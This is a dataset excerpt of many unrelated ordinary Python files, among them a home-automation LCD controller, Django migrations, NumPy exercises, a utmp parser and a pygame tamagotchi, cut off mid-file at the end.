text stringlengths 8 6.05M |
|---|
#!/usr/bin/env python
# End Node A runtime using I2C and MCP230.
# Jimmy Lamont 2017
# Make sure you enter your API Key, state, city (TWICE!) and Vera IP where annotated
#
#
import time
import requests
import Adafruit_CharLCD as LCD
from Adafruit_CharLCD import Adafruit_CharLCD
from subprocess import *
from time import sleep, strftime
from datetime import datetime
# Initialize the LCD using the pins
# Initialize the LCD plate (MCP23017 over I2C).
lcd = LCD.Adafruit_CharLCDPlate()
# create some custom characters (slots 1-7, 5x8 pixel bitmaps)
lcd.create_char(1, [2, 3, 2, 2, 14, 30, 12, 0])
lcd.create_char(2, [0, 1, 3, 22, 28, 8, 0, 0])
lcd.create_char(3, [0, 14, 21, 23, 17, 14, 0, 0])
lcd.create_char(4, [31, 17, 10, 4, 10, 17, 31, 0])
lcd.create_char(5, [8, 12, 10, 9, 10, 12, 8, 0])
lcd.create_char(6, [2, 6, 10, 18, 10, 6, 2, 0])
lcd.create_char(7, [31, 17, 21, 21, 21, 21, 17, 31])
# Ask the OS for this node's IP address(es).
# NOTE(review): on Python 3 communicate() returns bytes, so lcd.message(IP)
# below presumably relies on Python 2 (or on the library tolerating bytes) -- confirm.
p = Popen('hostname -I', shell=True, stdout=PIPE)
IP = p.communicate()[0]
# Boot splash sequence.
lcd.clear()
lcd.message('\n Hello')
time.sleep(3.0)
# Show version and name
lcd.clear()
lcd.message(' Vera \n endnode1')
time.sleep(2.0)
lcd.clear()
lcd.blink(True)
lcd.message('\n15NOV2017 v0.03')
time.sleep(2.0)
lcd.clear()
lcd.message(IP)
time.sleep(2.0)
# Start complete, select any mode, wait
lcd.show_cursor(False)
lcd.blink(False)
lcd.clear()
lcd.message('\n Select mode')
time.sleep(2.0)
# Vera luup endpoint; {} is filled with the house-mode number used below.
url = 'http://<Vera IP>:3480/data_request?id=lu_action&serviceId=urn:micasaverde-com:serviceId:HomeAutomationGateway1&action=SetHouseMode&Mode={}'
# Initial weather fetch (Weather Underground conditions endpoint).
r = requests.get('http://api.wunderground.com/api/<API Key>/conditions/q/<State>/<City>.json')
data = r.json()
# Make list of button values, text, backlight colour, and luup call.
buttons = ( (LCD.SELECT, '\n Home', (1,1,1), 1),
            (LCD.LEFT, '\n Panic' , (1,0,0), 5),
            (LCD.UP, '\n Night' , (0,0,1), 3),
            (LCD.DOWN, '\n Away' , (0,1,0), 2),
            (LCD.RIGHT, '\n Vacation' , (1,0,1), 4) )
# Bringing it all back
lastmessage = ""
while True:
    # Loop through each button and check if it is pressed.
    for button in buttons:
        if lcd.is_pressed(button[0]):
            # Button is pressed: ask Vera to switch house mode.
            r = requests.get(url.format(button[3]))
            if r.status_code==200:
                if 'ok' in r.text.lower():
                    lcd.clear()
                    lcd.message(button[1])
                    lastmessage = button[1]
                    lcd.set_color(button[2][0], button[2][1], button[2][2])
                # Vera answered 200 but the body did not acknowledge the change.
                else:
                    lcd.clear()
                    lastmessage = 'Vera Response not OK'
                    lcd.message(lastmessage)
            # No HTTP 200 from Vera at all: show the error for 10 seconds.
            else:
                lcd.clear()
                lastmessage = 'No 200 response \nfrom Vera'
                lcd.message(lastmessage)
                time.sleep(10.0)
    # Refresh wunderground data roughly every 8 hours (28800 s).
    # NOTE(review): this only fires when the loop lands on a second exactly
    # divisible by 28800, so refreshes can easily be missed -- confirm intent.
    if time.mktime(time.gmtime()) % 28800 == 0:
        r = requests.get('http://api.wunderground.com/api/<API Key>/conditions/q/<State>/<City>.json')
        data = r.json()
    # Idle display: clock plus current temperature, only redrawn on change.
    now = "{}\n{}".format(datetime.now().strftime('%b %d %H:%M'), data['current_observation']['temperature_string'])
    if lastmessage != now:
        lcd.clear()
        lcd.set_backlight(0)
        lcd.message (now)
        lastmessage = now
|
# Greedy activity selection: read N consultations as "start end" lines and
# report the maximum number of non-overlapping consultations.
consult_count = int(input())
scheduled = []
for _ in range(consult_count):
    fields = input().split(' ')  # renamed from `time` (shadowed a common module name)
    # Store (end, start) so sorting orders by finish time -- the greedy key.
    scheduled.append((int(fields[1]), int(fields[0])))
scheduled.sort()
# Bug fix: the original printed 1 even when there were zero consultations.
selected = 1 if scheduled else 0
current = 0
for idx in range(1, consult_count):  # renamed from `next`/`max` (shadowed builtins)
    # Take the next consultation if it starts at/after the current one ends.
    if scheduled[idx][1] >= scheduled[current][0]:
        current = idx
        selected += 1
print(selected)
|
#*_* coding=utf8 *_*
#!/usr/bin/env python
# Internal exception.
# NOTE(review): duplicates DenyAccess's code/message below and, unlike the
# other exceptions in this file, does not inherit from UnrealException -- confirm intent.
class InvalidEnum(Exception):
    code = 1003  # numeric error code surfaced to callers
    message = "Deny access"
# Exceptions propagated internally within the application.
class UnrealException(Exception):
    """Base class for application exceptions.

    ``message`` may contain %-style placeholders filled from the keyword
    arguments; the class-level ``code`` is copied into ``kwargs`` when the
    caller does not supply one.
    """
    message = "An unknown exception occurred."
    code = 1000

    def __init__(self, message=None, **kwargs):
        self.kwargs = kwargs
        try:
            self.kwargs.setdefault('code', self.code)
        except AttributeError:
            # A subclass removed ``code``: leave kwargs as given.
            pass
        if not message:
            try:
                message = self.message % kwargs
            except Exception:
                # Formatting failed (e.g. missing keys): fall back to the raw template.
                message = self.message
        super(UnrealException, self).__init__(message)
class LoopRequestException(UnrealException):
    # Raised when a request would loop back to this service itself.
    code = 1001
    message = "Not allow loop request self."
class PromptRedirect(UnrealException):
    """Display ``msg`` as an error message and redirect the client to ``uri``."""
    code = 1002
    message = "Display msg on error msg and redirect to uri"

    def __init__(self, msg, uri=None):
        self.msg = msg
        self.uri = uri
        # Bug fix: the original never called UnrealException.__init__, so the
        # exception had no args, no message, and no ``kwargs``/``code`` set.
        super(PromptRedirect, self).__init__(msg)
class DenyAccess(UnrealException):
    # Raised when the caller is not permitted to perform the operation.
    code = 1003
    message = "Deny access"
|
#!/usr/bin/python
# Copyright 2010-2011 Gentoo Foundation
# Distributed under the terms of the GNU General Public License v2
import os
import sys
sys.path.insert(0, os.environ['PORTAGE_PYM_PATH'])
import portage
portage._disable_legacy_globals()
def main(args):
    """Hold a Portage file lock on ``args[0]`` until stdin delivers one byte.

    Writes a NUL byte to stdout once the lock is acquired so the parent
    process knows it may proceed, then blocks on stdin; reading one byte
    releases the lock. Returns ``portage.os.EX_OK``.
    """
    # Decode byte arguments (Python 2 style argv) to unicode strictly.
    if args and isinstance(args[0], bytes):
        for i, x in enumerate(args):
            args[i] = portage._unicode_decode(x, errors='strict')
    # Make locks quiet since unintended locking messages displayed on
    # stdout would corrupt the intended output of this program.
    portage.locks._quiet = True
    lock_obj = portage.locks.lockfile(args[0], wantnewlockfile=True)
    # Signal the parent that the lock is held.
    sys.stdout.write('\0')
    sys.stdout.flush()
    # Block until the parent tells us to release (any single byte).
    sys.stdin.read(1)
    portage.locks.unlockfile(lock_obj)
    return portage.os.EX_OK

if __name__ == "__main__":
    rval = main(sys.argv[1:])
    sys.exit(rval)
|
# encoding:utf-8
#!/usr/bin/python
#-*-coding:utf-8-*-
import MySQLdb
# Insert 20 StudentSheet rows (uid 82..101, sheetName "软工10<i>").
# NOTE(review): this is Python 2 code (``xrange``); on Python 3 use ``range``.
db = MySQLdb.connect(host="localhost",user="root",passwd="4242",\
                     db="coolSignIn",charset="utf8",use_unicode=True)
cursor = db.cursor()
data = [82,"软工10"]
length = 20
for i in xrange(length):
    data[0] += i
    data[1] = data[1] + str(i)
    # SECURITY(review): SQL built via %-formatting -- use parameterized
    # queries (cursor.execute(sql, params)) if the inputs ever become
    # user-controlled.
    sql ="insert into StudentSheet(uid,sheetName)\
          values('%d','%s')" % tuple(data)
    try:
        cursor.execute(sql)
        db.commit()
    # NOTE(review): bare except hides all errors (including typos); prefer
    # ``except MySQLdb.Error``.
    except:
        db.rollback()
    # Reset the template values for the next iteration.
    data[0] = 82
    data[1] = "软工10"
db.close()
|
from test_utils import MockRequestResponse, TestPlatformClient
class TestDeleteConverstaion(TestPlatformClient):
    """Verify that ``delete_conversation`` issues the expected DELETE request."""
    # NOTE(review): class name misspells "Conversation"; left unchanged in case
    # anything references it by name.

    def test_delete_conversation(self, layerclient, monkeypatch):
        def verify_request_args(method, url, headers, data, params):
            # Stub for requests.request that asserts on the outgoing call.
            assert method == "DELETE"
            assert url == (
                "https://api.layer.com/apps/TEST_APP_UUID/"
                "conversations/TEST_CONVERSATION_UUID"
            )
            assert headers == {
                'Accept': 'application/vnd.layer+json; version=1.0',
                'Authorization': 'Bearer TEST_BEARER_TOKEN',
                'Content-Type': 'application/json',
            }
            assert data is None
            return MockRequestResponse(True, {})
        monkeypatch.setattr("requests.request", verify_request_args)
        layerclient.delete_conversation('TEST_CONVERSATION_UUID')
|
from random import uniform
# Two 25-element bipolar input patterns with targets t = [1, -1].
x=[[1,1,1,1,1,-1,-1,1,-1,-1,-1,-1,1,-1,-1,-1,-1,1,-1,-1,-1,-1,1,-1,-1],
   [1,-1,-1,-1,1,-1,1,-1,1,-1,-1,-1,1,-1,-1,-1,1,-1,1,-1,1,-1,-1,-1,1]]
t=[1,-1]
alfa=0.1;  # learning rate
bold=uniform(-0.5, 0.5);  # bias, randomly initialized
wold=[uniform(-0.5, 0.5),uniform(-0.5, 0.5)]  # one weight per output unit
# NOTE(review): these are aliases of wold/bold, not copies.
wnew=wold;
bnew=bold;
flag=0;  # epoch counter
errtotal=0
errant=0
y_in=0
y=0
# NOTE(review): errtotal and errant both start at 0, so the condition
# (0 - 0) > 1e-7 is False on the first test and this training loop NEVER
# executes -- the prints below show the untrained random weights. Confirm
# whether a do-while style first pass was intended.
while (errtotal-errant)>0.0000001:
    flag+=1
    errant=errtotal;
    for k in x:
        for p in range(0,2):
            for i in range(0,len(k)):
                # Linear (identity) activation delta-rule update.
                y_in=k[i]*wold[p]+bold
                y=y_in;
                errtotal+=0.5*(t[p] - y)*(t[p] - y);
                wold[p]+= alfa*(t[p]-y)*k[i];
                bold+=alfa*(t[p]-y);
print(wold)
print(bold)
print(wnew)
print(bnew)
def neu(x):
    """Classify each pattern in ``x`` with the global weights ``wold``/``bold``.

    Prints 1 for a non-negative activation and -1 otherwise.
    NOTE(review): only the last element's activation of each pattern survives
    the inner loops (``y`` is overwritten every step) -- confirm this is the
    intended net input rather than a sum over inputs.
    """
    y=0
    y_in=0
    for k in x:
        for p in range(0,1):
            for i in range(0,len(k)):
                y_in=k[i]*wold[p]+bold
                y=y_in;
        if y>=0:
            print(1)
        else:
            print(-1)
neu(x)
|
import webapp2
from emailsender import EmailSender
from review import ReviewHandler
from new import NewHandler
# WSGI routing: review list at '/', creation form at '/nuevo'.
app = webapp2.WSGIApplication([
    ('/', ReviewHandler),
    ('/nuevo', NewHandler)
], debug=True)
|
def solution(s):
    """Count salutes between guards walking toward each other.

    Each '>' paired with any later '<' produces one meeting, and every
    meeting is two salutes. Runs in a single O(n) pass instead of the
    original O(n^2) nested scan.
    """
    walking_right = 0  # '>' guards seen so far
    meetings = 0
    for ch in s:
        if ch == '>':
            walking_right += 1
        elif ch == '<':
            # This '<' will meet every '>' already walking toward it.
            meetings += walking_right
    return meetings * 2

print(solution("<<>><"))
# Generated by Django 2.1.2 on 2018-11-27 15:08
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add the nullable ``temp_cuti`` flag to the ``mahasiswa`` model."""
    # NOTE(review): NullBooleanField is deprecated in later Django versions in
    # favour of BooleanField(null=True); fine for the Django 2.1 this was
    # generated with.

    dependencies = [
        ('datawarehouse', '0008_auto_20181110_1606'),
    ]

    operations = [
        migrations.AddField(
            model_name='mahasiswa',
            name='temp_cuti',
            field=models.NullBooleanField(),
        ),
    ]
|
from tools.primes import prime_factors_of, primes_under, is_prime
from tools.collections import mil_primes, mil_primes_dict
from more_itertools import consecutive_groups
import numpy as np
# Search for the first run of 4+ consecutive integers that each have more than
# three prime factors, scanning in 100 000-number windows (up to 5 000 000).
quad_prime_factors = []
for hd in range(50):
    print(hd * 100000 , "reached")
    for n in range(hd * 100000, (hd + 1) * 100000):
        factors = prime_factors_of(n)
        if len(factors) > 3:
            quad_prime_factors.append(n)
    # Group the qualifying numbers into runs of consecutive integers and keep
    # only runs longer than 3.
    cqpf = [list(item) for item in consecutive_groups(quad_prime_factors)]
    cqpf = [i for i in cqpf if len(i) > 3]
    if len(cqpf):
        print(cqpf)
        break
    else:
        # Keep only the tail so a run spanning a window boundary is not lost.
        quad_prime_factors = quad_prime_factors[-5:]
|
# Generated by Django 2.2.11 on 2020-03-13 18:41
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add nullable descriptive fields to ``detail`` and tighten existing ones.

    Adds department/employments_url/location/manager/subordinates_url, makes
    ``emp_id`` unique and caps ``personal_email`` at 50 characters.
    """

    dependencies = [
        ('orgchart', '0005_auto_20200313_1358'),
    ]

    operations = [
        migrations.AddField(
            model_name='detail',
            name='department',
            field=models.CharField(max_length=50, null=True),
        ),
        migrations.AddField(
            model_name='detail',
            name='employments_url',
            field=models.TextField(null=True),
        ),
        migrations.AddField(
            model_name='detail',
            name='location',
            field=models.TextField(null=True),
        ),
        migrations.AddField(
            model_name='detail',
            name='manager',
            field=models.CharField(max_length=40, null=True),
        ),
        migrations.AddField(
            model_name='detail',
            name='subordinates_url',
            field=models.TextField(null=True),
        ),
        migrations.AlterField(
            model_name='detail',
            name='emp_id',
            field=models.IntegerField(unique=True),
        ),
        migrations.AlterField(
            model_name='detail',
            name='personal_email',
            field=models.CharField(max_length=50),
        ),
    ]
|
# Generated by Django 2.2.4 on 2019-08-28 07:03
from django.db import migrations, models
class Migration(migrations.Migration):
    """Make latitude/longitude optional (blank/null) on ``bar`` and ``distillery``."""

    dependencies = [
        ('whiskydatabase', '0024_bar'),
    ]

    operations = [
        migrations.AlterField(
            model_name='bar',
            name='lat',
            field=models.FloatField(blank=True, null=True),
        ),
        migrations.AlterField(
            model_name='bar',
            name='lon',
            field=models.FloatField(blank=True, null=True),
        ),
        migrations.AlterField(
            model_name='distillery',
            name='lat',
            field=models.FloatField(blank=True, null=True),
        ),
        migrations.AlterField(
            model_name='distillery',
            name='lon',
            field=models.FloatField(blank=True, null=True),
        ),
    ]
|
#odd or even from 1-100
'''
####method: 1
myOddList=[]
myEvenList=[]
for i in range(1,101):
if(i%2==0):
print("even = {0}".format(i))
elif(i%2==1):
print("odd = {0}".format(i))
'''
###Method 2:
# Partition 1..100 into odd and even numbers using comprehensions.
myOddList = [n for n in range(1, 101) if n % 2 == 1]
myEvenList = [n for n in range(1, 101) if n % 2 == 0]
print("Odd number from 1 - 100 are: ", myOddList)
print()
print("Even number from 1 - 100 are: ", myEvenList)
|
"""
Wrapper for the managment teams device manager endpoints.
Nov, 27, 2016 - Pablo Caruana pablo dot caruana at gmail dot com
"""
import requests
import logging
class DeviceManager:
    """Wrapper for the management team's device-manager HTTP endpoints.

    All calls target ``http://<dm_host.ip>:<dm_host.port>/...``.
    """

    def __init__(self, dm_host):
        """param: dm_host : object exposing ``ip`` and ``port`` attributes."""
        self._address = dm_host.ip
        self._port = dm_host.port
        self.log = logging.getLogger()

    def _set_state(self, state):
        """POST our component state to the DM.

        Returns True when the DM answers 200/201, False on any failure.
        """
        self.log.info('Setting state to {}'.format(state))
        try:
            url_str = 'http://{}:{}/set_state/component'.format(
                self._address,
                self._port
            )
            self.log.debug(url_str)
            resp = requests.post(url_str, json={'state' : state})
            return resp.status_code in [200, 201]
        except Exception:
            # Bug fix: was a bare ``except:``, which also swallowed
            # KeyboardInterrupt/SystemExit.
            self.log.exception('Failed to set state.')
            return False

    def alert_online(self):
        """
        The Device manager needs to know that the crawler has started.
        This method sends an alert to the DM, saying that we are online.
        TODO: Get request format from mgmt team.
        """
        return self._set_state('online')

    def send_waiting(self):
        """
        In the event that there are no new seeds, we need to tell the DM that
        we are waiting.
        TODO: Get request format from mgmt team.
        """
        return self._set_state('waiting')

    def send_error(self):
        """
        Tell the mgmt team that we hit a fatal error, and that we won't
        continue to run.
        Note: Does not take any params.
        """
        return self._set_state('error')

    def get_unprop_chunks(self):
        """
        Requests the list of chunks which should be stored on the crawler.
        Response JSON should look like:
            {
                "chunks": [100, 101, 102]
            }
        """
        resp = requests.get(
            'http://{}:{}/get_chunks/unpropagated'.format(
                self._address,
                self._port
            )
        )
        chunks = resp.json()['chunks']
        return chunks

    def alert_chunk(self, chunk_id):
        """
        Alerts mgmt that we are done with the chunk corresponding to chunk_id.
        param: chunk_id : String corresponding to the id of the chunk we just
                          finished.
        Body format:
            {
                "chunk_id": 101,
                "state": "crawled"
            }
        Returns True on HTTP 200/201.
        """
        resp = requests.post(
            'http://{}:{}/set_state/content_chunk'.format(
                self._address,
                self._port
            ),
            json={
                'chunk_id' : chunk_id,
                'state' : 'crawled'
            }
        )
        return resp.status_code in [200, 201]

    def mark_link_crawled(self, link, success):
        """
        Alert's management that `link` has been crawled, and does not need to
        be checked again. Uses the /set_state/link endpoint.
        param: link : String containing the link which has been crawled.
        param: success : True -> state 'crawled', False -> state 'error'.
        Returns True on HTTP 200/201 (consistency fix: the response status was
        previously discarded and None returned, unlike alert_chunk).
        """
        state = 'crawled' if success else 'error'
        resp = requests.post(
            'http://{}:{}/set_state/link'.format(  # formerly crawler
                self._address,
                self._port
            ),
            json={'link' : link, 'state' : state}
        )
        return resp.status_code in [200, 201]
|
from sys import stdin
# Read n integers in [-4000, 4000] and print: rounded mean, median,
# "representative" mode (the second-smallest mode when several values tie
# for the highest frequency, else the mode itself) and the range.
n = int(stdin.readline())
num =[0 for _ in range(8001)]  # frequency table, index = value + 4000
maxi = -4001
mini = 4001
sum_tn = 0
max_bindo = 0  # highest frequency seen so far
hana = True    # True while the current max frequency is held by one value
for i in range(n):
    tn = int(stdin.readline())
    sum_tn += tn
    if tn < mini:
        mini = tn
    if tn > maxi:
        maxi = tn
    num[tn+4000] += 1
    if max_bindo < num[tn+4000]:
        # New strict maximum: single mode again.
        max_bindo = num[tn+4000]
        max_index = tn+4000
        hana = True
    elif max_bindo == num[tn+4000] and hana:
        # A second value reached the same frequency: remember it and mark
        # the tie. NOTE(review): this online tie-tracking is fragile -- it
        # only remembers one extra index; the fallback scan below is what
        # actually resolves multi-way ties.
        max_index = tn+4000
        hana = False
# round() is banker's-rounding-adjacent here; matches the intended output.
arithmatic_average = round(sum_tn / n)
# Rebuild the sorted sequence from the frequency table to find the median.
sort_num = []
for i, v in enumerate(num):
    if v != 0:
        for _ in range(v):
            sort_num.append(i-4000)
        if len(sort_num) == n:
            break
median_value = sort_num[n>>1]
if hana:
    # Unique mode.
    cheobin_value = max_index - 4000
else:
    # Tie: scan ascending and take the SECOND value with the max frequency.
    c=0
    for i in range(8001):
        if num[i] == max_bindo:
            if c == 1:
                cheobin_value = i - 4000
                break
            c+=1
bomui = maxi - mini  # range of the data
print(arithmatic_average, median_value, cheobin_value, bomui, sep='\n', end='')
# coding: utf-8
# In[2]:
import numpy as np
# Jupyter-notebook export: NumPy indexing/slicing/arithmetic practice cells.
# Bare expressions (e.g. ``lohit``) only display output inside a notebook;
# as a plain script they are no-ops.
TwoD = np.array([[2,3,8],[3,4,6],[2,4,6]])
print(TwoD)
print(TwoD[0][0])
print(TwoD[2][1])
print(TwoD[2,2])
print(TwoD[:2])
print(TwoD[:2,0:1])
# In[3]:
new = np.arange(0,10)
# Slices are VIEWS: writing through slice_of_array mutates ``new`` too.
slice_of_array=new[0:6]
print(slice_of_array)
slice_of_array[:]=99
print(slice_of_array)
new2 = new.copy()  # .copy() detaches from the original buffer
print(new2)
# In[5]:
lohit=np.arange(1,11)
lohit
bool_arr=lohit>4  # boolean mask
bool_arr
# In[10]:
lohit[bool_arr]
# In[11]:
arr = np.arange(25)
ranarr=np.random.randint(0,50,10)
ranarr
arr
# In[12]:
arr[arr<5]
# In[13]:
from numpy.random import randint
# In[14]:
randint(3,22)
# In[15]:
arr_2d=np.arange(40).reshape(4,10)
arr_2d
# In[16]:
import numpy as np
new_array = np.arange(0,11)
new_array
# In[17]:
new_array+new_array
# In[18]:
new_array-new_array
# In[19]:
new_array*new_array
# In[20]:
# NOTE: 0/0 here produces nan with a RuntimeWarning (elementwise division).
new_array/new_array
# In[21]:
new=new_array+1000
new
# In[22]:
new = new_array*10
new
# In[23]:
new=new/12
new
# In[25]:
new_array=np.arange(1,10)
new=new_array+new_array
new
n=new/10
n
# In[26]:
ok=np.arange(3,10)
ok
# In[27]:
np.sqrt(ok)
# In[28]:
np.max(ok)
# In[29]:
np.min(ok)
# In[30]:
np.sin(ok)
# In[32]:
np.log(ok)
# In[34]:
# log(0) yields -inf with a RuntimeWarning.
log_number=np.arange(0,3)
print(np.log(log_number))
# In[96]:
n=np.zeros(10)
n
# In[105]:
n+5
# In[106]:
np.ones(10)*5
# In[112]:
N= (np.arange(100).reshape(10,10)+1)/100
N
# In[113]:
np.arange(1,101).reshape(10,10)/100
# In[100]:
np.linspace(0,1,20)
# In[42]:
np.arange(10,51)
# In[108]:
np.arange(9).reshape(3,3)
# In[109]:
np.eye(3)
# In[110]:
np.random.rand()
# In[111]:
np.linspace(0,50,200)
# In[46]:
np.random.randn(25)
# In[107]:
np.arange(10,51,2)
# In[114]:
n = np.arange(25).reshape(5,5)+1
n
# In[117]:
n = np.arange(1,26).reshape(5,5)
n
# In[118]:
print(n[2:,1:])
# In[77]:
np.sum(n)
# In[80]:
print(n[4:5])
# In[78]:
print(n[3:5])
# In[116]:
# In[62]:
np.array([[12,13,14,15],[17,18,19,20],[22,23,24,25]])
# In[85]:
np.array(n[0:3,1:2])
# In[104]:
np.sqrt(52)
# In[103]:
np.arange(11,16)*5
|
import pickle
import os
from datetime import datetime
def get_pickle_file_content(full_path_pickle_file):
    """Load and return the object stored in a pickle file.

    ``encoding='latin1'`` keeps Python-2-era pickles readable on Python 3.
    """
    # ``with`` guarantees the handle is closed even if unpickling raises
    # (the original leaked the file handle on error).
    with open(full_path_pickle_file, 'rb') as pickle_file:
        return pickle.load(pickle_file, encoding='latin1')
def get_all_pickle_filenames(pickle_file_dir):
    """Return the names of all '*.pickle' files directly inside ``pickle_file_dir``."""
    return [name for name in os.listdir(pickle_file_dir)
            if name.endswith(".pickle")]
def save_vocab_size(full_path_vocab_file, vocab_size):
    """Write the vocabulary size to a text file, overwriting any old content."""
    # ``with`` closes the file even if the write raises (original leaked on error);
    # also avoids shadowing the (Python 2) builtin name ``file``.
    with open(full_path_vocab_file, 'w+') as fh:
        fh.write(str(vocab_size))
def save_sequence_length(full_path_seq_file, biggest):
    """Write the longest observed sequence length to a text file."""
    # ``with`` closes the file even if the write raises (original leaked on error).
    with open(full_path_seq_file, 'w+') as fh:
        fh.write(str(biggest))
def build_vocab_dict_from_set(vocab_set):
    """Map each word to a unique 1-based integer id.

    Ids follow the set's iteration order, matching the original loop.
    """
    return {word: idx for idx, word in enumerate(vocab_set, start=1)}
def save_vocab(full_path_vocabfile, unique_vocab):
    """Pickle the vocabulary object to ``full_path_vocabfile``."""
    # ``with`` closes the file even if pickling raises (original leaked on error).
    with open(full_path_vocabfile, 'wb+') as pickle_file:
        pickle.dump(unique_vocab, pickle_file)
def main():
    """Build the token vocabulary from all tokenized pickle files and persist
    the vocabulary set, its size, and the longest sequence length.

    Paths are hard-coded to /tmp; each pickle file is expected to contain an
    iterable of (disassembly_string, return_type) pairs.
    """
    start=datetime.now()
    bag_styled_file_dir = "/tmp/savetest"
    full_path_vocab_file = "/tmp/vocab_size.txt"
    full_path_seq_file = "/tmp/sequence_length.txt"
    full_path_vocabfile = "/tmp/vocab.pickle"
    unique_vocab = set()
    print(f'Read out all tokenized pickle files in >{bag_styled_file_dir}<')
    all_files = get_all_pickle_filenames(bag_styled_file_dir)
    if len(all_files) == 0:
        print(f'Error: No tokenized files in dir >{bag_styled_file_dir}<')
        exit()
    counter = 0  # NOTE(review): unused
    biggest = 0  # longest (character) length among kept disassemblies
    # Length bounds: samples outside [50, 30000] characters are skipped.
    longest_disas = 30000
    shortest_disas = 50
    len_all_files = len(all_files)
    len_all_files_counter = 1
    for file in all_files:
        content = get_pickle_file_content(bag_styled_file_dir + '/' + file)
        print(f'Building vocab from file nr >{len_all_files_counter}/{len_all_files}<', end='\r')
        len_all_files_counter += 1
        for disas,ret_type in content:
            #print(f'len disas >{len(disas)}<')
            ### we filter out some
            if (len(disas) <= longest_disas) and ( len(disas) >= shortest_disas):
                # Whitespace-split tokens form the vocabulary.
                for disas_item in disas.split():
                    unique_vocab.add(disas_item)
                if len(disas) > biggest:
                    biggest = len(disas)
        #break
    stop = datetime.now()
    #vocab_dict = build_vocab_dict_from_set(unique_vocab)
    print(f'Run took:{stop-start} Hour:Min:Sec')
    print(f'We save Vocabulary in file >{full_path_vocab_file}<')
    print(f'Vocab size is >{len(unique_vocab)}<')
    print(f'Biggest sequence length is >{biggest}<')
    save_vocab(full_path_vocabfile, unique_vocab)
    save_vocab_size(full_path_vocab_file, len(unique_vocab))
    save_sequence_length(full_path_seq_file, biggest)
    print(unique_vocab)

if __name__ == "__main__":
    main()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Script to parse utmp files."""
import argparse
import logging
import os
import sys
from dtformats import output_writers
from dtformats import utmp
def Main():
    """The main program function.

    Parses the command line, sniffs the utmp variant from the file's first
    11 bytes (macOS utmpx vs Linux libc6 utmp) and opens it with the
    matching dtformats parser.

    Returns:
      bool: True if successful or False if not.
    """
    argument_parser = argparse.ArgumentParser(description=(
        'Extracts information from utmp files.'))
    argument_parser.add_argument(
        '-d', '--debug', dest='debug', action='store_true', default=False,
        help='enable debug output.')
    argument_parser.add_argument(
        'source', nargs='?', action='store', metavar='PATH',
        default=None, help='path of the utmp file.')
    options = argument_parser.parse_args()
    if not options.source:
        print('Source file missing.')
        print('')
        argument_parser.print_help()
        print('')
        return False
    logging.basicConfig(
        level=logging.INFO, format='[%(levelname)s] %(message)s')
    output_writer = output_writers.StdoutWriter()
    try:
        output_writer.Open()
    except IOError as exception:
        print(f'Unable to open output writer with error: {exception!s}')
        print('')
        return False
    # Signature sniff: macOS utmpx files start with 'utmpx-1.00\x00'.
    with open(options.source, 'rb') as file_object:
        file_object.seek(0, os.SEEK_SET)
        utmp_signature = file_object.read(11)
    if utmp_signature == b'utmpx-1.00\x00':
        utmp_file = utmp.MacOSXUtmpxFile(
            debug=options.debug, output_writer=output_writer)
    else:
        utmp_file = utmp.LinuxLibc6UtmpFile(
            debug=options.debug, output_writer=output_writer)
    utmp_file.Open(options.source)
    # NOTE(review): only a header line is written here; entry output
    # presumably happens via the debug output writer during Open -- confirm.
    output_writer.WriteText('utmp information:')
    utmp_file.Close()
    output_writer.WriteText('')
    output_writer.Close()
    return True

if __name__ == '__main__':
    if not Main():
        sys.exit(1)
    else:
        sys.exit(0)
|
import os
# Sample data files are located in the same folder as this module.
module_path = os.path.dirname(__file__)


def datapath(fname=None):
    """Return the path of the 'testdata' folder, or of ``fname`` inside it."""
    base = os.path.join(module_path, 'testdata')
    return os.path.join(base, fname) if fname else base
|
from kivy.app import App
from kivy.uix.boxlayout import BoxLayout
from kivy.lang.builder import Builder
# Load the widget tree declared in the KV file before any widgets are built.
Builder.load_file('KV/tri.kv')

class Try(BoxLayout):
    """Root widget; the checkbox ids referenced here are declared in KV/tri.kv."""
    def __init__(self, **kwargs):
        super(Try, self).__init__(**kwargs)
        # Pre-tick the chronic-cough checkbox from the KV file.
        self.ids.cb_chronic_cough.active = True
    # def fun(self):
    #     print(self.ids.cb_chronic_cough.active)
    pass

class Main2(App):
    """Kivy application whose root widget is Try."""
    def build(self):
        return Try()

Main2().run()
# 6. Write a Python program which accepts
# a sequence of comma-separated numbers
# from user and generate a list
# and a tuple with those numbers.
# Sample data : 3, 5, 7, 23
# Output :
# List : ['3', ' 5', ' 7', ' 23']
# Tuple : ('3', ' 5', ' 7', ' 23')
# Prompt for comma-separated numbers and echo them back as a list and a tuple.
inp_str: str = input('Write a sequence of\n comma-separated numbers: ')
values = inp_str.split(',')
print(f'List: {values}')
print(f'Tuple: {tuple(values)}')
|
# Szymon Romanowski projekt PJF - tamagotchi
#-------------------------------------------------------------------------------------------------
# MAIN -------------------------------------------------------------------------------------------
#-------------------------------------------------------------------------------------------------
import pygame
import random
from Menu import Menu
from Pet import Pet
from Display import Display
# Main game logic
# Main game logic
def main():
    """Run the tamagotchi game loop: handle input, decay stats, animate.

    Stats (food, happiness, hygiene, health) decay on fixed frame-count
    intervals; the pet can fall ill, and dies when health reaches zero.
    """
    pygame.init()
    screen = Display()
    tamagotchi = Pet(screen.display)
    menu = Menu(tamagotchi, screen.display)
    frameCount = 0  # drives all the modulo-based timers below
    screen.display.fill((255, 255, 255))
    screen.update()
    menu.displayButtons()
    running = True
    # GAME LOOP
    while running:
        # EVENTS HANDLING
        for event in pygame.event.get():
            if event.type == pygame.QUIT:
                running = False
            if event.type == pygame.MOUSEBUTTONDOWN:
                x, y = event.pos
                # reset: clicking the 100x100 reset area spawns a fresh pet
                if ((500 <= x <= 600) and (600 <= y <= 700)):
                    pygame.draw.rect(screen.display, (255, 255, 255), (0, 100, 700, 500))
                    tamagotchi = Pet(screen.display)
                    menu.tamagotchi = tamagotchi
                    print("RESET")
                menu.handleMouse(x,y)
        # POOPING: ~1-in-3 chance every 1000 frames
        if frameCount % 1000 == 999:
            rand = random.randint(0, 2)
            if rand == 1:
                tamagotchi.poop()
        # LOWERING HYGIENE: faster decay per uncleaned poo; illness below 30
        if tamagotchi.pooCounter > 0:
            if frameCount % 50 == 0:
                if tamagotchi.hygiene < 30:
                    tamagotchi.ill = 1
                if tamagotchi.hygiene <= 0:
                    tamagotchi.hygiene = 0
                else:
                    tamagotchi.hygiene -= 1 * tamagotchi.pooCounter
        # HUNGER (LOWERING FOOD): starvation costs health below 20
        if frameCount % 70 == 0:
